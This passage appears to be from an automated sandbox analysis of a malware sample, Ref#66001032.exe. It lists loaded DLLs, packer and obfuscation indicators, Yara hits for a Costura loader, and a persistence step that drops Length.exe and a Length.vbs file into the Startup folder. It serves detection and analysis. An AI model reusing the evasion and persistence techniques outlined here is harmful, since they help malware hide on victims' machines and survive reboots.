                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: msvcp140.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\Desktop\Ref#66001032.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                      Source: Ref#66001032.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Ref#66001032.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#66001032.exe, 00000000.00000002.3512089608.0000000005710000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#66001032.exe, 00000000.00000002.3512089608.0000000005710000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, cwTvB654OC75eWlmL4Y.cs.Net Code: Type.GetTypeFromHandle(nrZwh8o90W6OiuiGOMY.EJsbs9ljZh(16777354)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(nrZwh8o90W6OiuiGOMY.EJsbs9ljZh(16777253)),Type.GetTypeFromHandle(nrZwh8o90W6OiuiGOMY.EJsbs9ljZh(16777285))})
                      .NET source code contains potential unpacker
                      Source: Ref#66001032.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: Length.exe.0.dr, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Ref#66001032.exe.6220000.11.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#66001032.exe.6220000.11.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#66001032.exe.6220000.11.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#66001032.exe.6220000.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#66001032.exe.6220000.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.Ref#66001032.exe.4343ef0.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#66001032.exe.4343ef0.5.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#66001032.exe.4343ef0.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#66001032.exe.4343ef0.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#66001032.exe.4343ef0.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.Ref#66001032.exe.4393f10.1.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#66001032.exe.4393f10.1.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#66001032.exe.4393f10.1.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#66001032.exe.4393f10.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#66001032.exe.4393f10.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.42976b0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.6420000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.6420000.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.42976b0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.3cb45f0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.3b899c8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3526218119.0000000006420000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3469471200.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3486694329.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#66001032.exe PID: 2736, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026C5ED0 push esi; iretd 0_2_026C5ED2
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026C5F5F push edi; iretd 0_2_026C5F62
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026C5F58 push edi; iretd 0_2_026C5F5A
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026C5F5B push edi; iretd 0_2_026C5F5E
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_056F713C push ss; ret 0_2_056F7147
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061D6721 push es; iretd 0_2_061D6730
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061D241A push esp; iretd 0_2_061D2421
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061D5A93 push es; iretd 0_2_061D5A94
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061EE810 push es; ret 0_2_061EE8C0
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061E0DB1 push es; iretd 0_2_061E0DB4
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_0621CE13 push esi; ret 0_2_0621CE15
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_0621AC5F push es; retf 0_2_0621AC70
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06216564 push eax; ret 0_2_0621656D
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_062ED8F2 push es; ret 0_2_062ED900
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06313E28 push cs; ret 0_2_06313E2E
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_0631C61F push es; ret 0_2_0631C645
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06315EB9 push es; iretd 0_2_06315F94
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06315F9B push es; ret 0_2_06315F9C
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06315D33 push es; retf 0_2_06315D34
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06317833 push es; retn 3176h0_2_0631787C
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06416AC9 push eax; retf 0_2_06416ACA
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06414B92 push eax; retf 0_2_06414B93
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0294FF70 push es; ret 6_2_0294FF80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02940C45 push ebx; retf 6_2_02940C52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02940C6D push edi; retf 6_2_02940C7A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065C4D50 push es; ret 6_2_065C4D60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065CFAF0 push es; ret 6_2_065CFAF4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065D76E1 push ecx; iretd 6_2_065D76EE
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, pWd53faKORc7IQ8VvuQ.csHigh entropy of concatenated method names: 'mnLacPOMou', 'nrFaNUurXY', 'bZHar4l879', 'r4BaT0P2nY', 'Txiay2WyG5', 'XqJa3KYeMb', 'V7gawKOtpx', 'oa9akHe8ug', 'mmfafCQSLT', 'iWkansQ5Tg'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, zmUmP7oP4fer7FF7Ejw.csHigh entropy of concatenated method names: 'QKe3exemn9', 'D3330DxIc2', 'pET3zPV0SD', 'lO0HIYosr0', 'hFFHaVpvNT', 'eCqH7pi7lL', 'EJvHtpmVLW', 'nQXr3tq052', 'Lg4HsZnt5K', 'z5kHXUca4M'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, EHQlZEUEjCutjXEc6Hq.csHigh entropy of concatenated method names: 'zrKcTimtQa', 'LpAcmeA159', 'uMCcykVcZn', 'iYXTD8h3XKkGlhJhOPF', 'AahEJIhHPis6YBwftP8', 'YhKUdF8wxy', 'N5CUPlAn2g', 'Xt1UegqNgt', 'jHmU0Ea8W9', 'pYKUzSaY3N'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, YmFNjlc6eeo4QEFdPKS.csHigh entropy of concatenated method names: 'bajcjn66Es', 'mbncbSm4Bv', 'xVwcEZkxvu', 'eBZcMFg7XI', 'iefcdVM2HF', 'X5RcPij7VB', 'wusceMGlhw', 'WoKc00YOK5', 'mMnczIBTcN', 'y0K5IxRKsi'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, eunYLeYhBsf7XGNV0QK.csHigh entropy of concatenated method names: 'x90YR14SWg', 'TY0YbRvGFu', 'je1YMQ6lv8', 'AVBYPW6SMF', 'Tm7YeifA0e', 'JFAY0hVtWX', 'igLYzCimSE', 'WadCIgYf1L', 'K4QCawkpLE', 'ykDC7IH7BO'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, cwTvB654OC75eWlmL4Y.csHigh entropy of concatenated method names: 'LBR3uFhz1c4gG53MbKw', 'OBdybnJIdtKfIu1m08y', 'BvZoqGcPmM', 'vh0ry9Sq2v', 'HXGor2P3fR', 'PYwoDYZmME', 'bHvoTcMt1Y', 'rhXomTLKBQ', 'FG6b7a9lPP', 'qA65AZ0ITu'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, pXBHNyolSiUavtVTU2b.csHigh entropy of concatenated method names: 'wx4o6n9Qt3', 'KFdoVk2E7w', 'bf5ohMNoUC', 'q11oJOLV9J', 'hKdoR0Tn7H', 'sxrojVpvGE', 'trpobb8EYa', 'H1noEGQgFx', 'DkqoMBNP9a', 'usrodKw2CH'
                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile created: C:\Users\user\AppData\Roaming\Length.exeJump to dropped file

                      Boot Survival

                      barindex
                      Drops VBS files to the startup folder
                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbsJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbsJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
